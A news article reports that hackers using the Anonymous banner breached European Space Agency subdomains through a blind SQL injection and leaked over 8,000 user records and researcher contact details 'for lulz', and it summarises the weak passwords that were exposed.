A group of hackers operating under the Anonymous banner hacked the European Space Agency (ESA) and leaked the data for no reason other than for “lulz.” Over 8,000 people will not find anything amusing about the breach since their names, email addresses and passwords were posted in one of three data dumps on JustPaste.it.
The hackers divided the compromised records into three separate posts and leaks: registered users, database schemas and ESA collaborators; the latter included a list of contact details with hundreds of full names, fax numbers, phone numbers, addresses, email addresses and the name of the organization to which each researcher or supporter belonged.
The hackers claim to have taken from data from ESA subdomains such as sci.eas.int, exploration.esa.int, and due.esrin.ease.int. Each of the dumps specifies the targeted subdomains of ESA as well as “Motivation: Lulz” listed as the attackers’ reasoning for the hacks.
One of the dumps contains over 8,000 names, email addresses and passwords which the hackers noted as being “oc4_subscribers.” A good portion of the leaked passwords are a mere three characters, with most of those being a combination of three numbers. Below are samples of some of the three-number passwords without linking to the leak or tying the passwords to user names and email addresses; hopefully no user reused the password elsewhere as decent password policies would never allow only three-characters and no mixture of letters and symbols.
CSO’s Steve Ragan analyzed the 8,107 passwords exposed, finding 39% (3,191) were three-character passwords, 16% (1,314) were eight-characters passwords which could have easily been cracked, and only 22 20-character passwords; the longest password had 24 characters with the rest of the leaked passwords falling somewhere in-between the extremes.
The hackers reportedly used a blind SQL vulnerability to gain access to the ESA’s database, according to a post that links to the leaks. Why target the ESA? One hacker involved in the attack told HackRead:
BECAUSE XMAS IS COMING AND WE HAD TO DO SOMETHING FOR FUN SO WE DID IT FOR THE LULZ.
One of the dumps lists the available databases from ESA subdomains, database management system users, as well as technical details like the operating system being used by the web servers, the web app technology and the back-end database management system; those ranged from Linux Debian with Apache and MySQL to ColdFusion and Oracle.
The attackers using the Anonymous banner were reportedly the same hackers who previously breached the website of the United Nations Framework Convention on Climate Change and leaked the personal details of 1,415 officials; the same group hacked the World Trade Organization before leaking the database and the personal details of WTO members.
The breach occurred while the ESA is in the news due to the launch of EAS astronaut Tim Peake, NASA astronaut Tim Kopra and Russian commander Yuri Malenchenko to the International Space Station; the astronauts will spend six months working and living on the ISS.